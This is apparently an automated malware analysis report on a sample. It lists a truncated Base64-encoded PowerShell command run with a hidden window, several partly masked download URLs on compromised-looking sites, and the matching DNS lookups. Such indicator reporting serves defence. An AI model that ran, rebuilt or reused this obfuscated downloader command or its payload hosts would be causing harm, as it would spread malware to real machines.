Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAGMAdABiAGUAbwBtAD0AJwBQAGYAaQBkADAAYwBnACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAGAAVQBgAFIASQB0AFkAcABgAFIATwB0AE8AYABjAGAAbwBsACIAIAA9AC...
Network activity
Connects to
- 'gp##w8.net':80
TCP
HTTP GET requests
- http://se###agro.com/wp-content/MZ9Qd/
- http://ar####lin.ematj.com/up/E9Oj3tPaCk/
- http://da######lmoratel.ematj.com/wp-admin/eDORY317/
- http://ho###bsshop.su/
- http://kh#####iaquacity.com/wp-admin/FLgiVM8/
UDP
- DNS ASK se###agro.com
- DNS ASK ar####lin.ematj.com
- DNS ASK da######lmoratel.ematj.com
- DNS ASK ho###bsshop.su
- DNS ASK kh#####iaquacity.com
- DNS ASK gp##w8.net
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAGMAdABiAGUAbwBtAD0AJwBQAGYAaQBkADAAYwBnACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAGAAVQBgAFIASQB0AFkAcABgAFIATwB0AE8AYABjAGAAbwBsACIAIAA9AC...' (with hidden window)
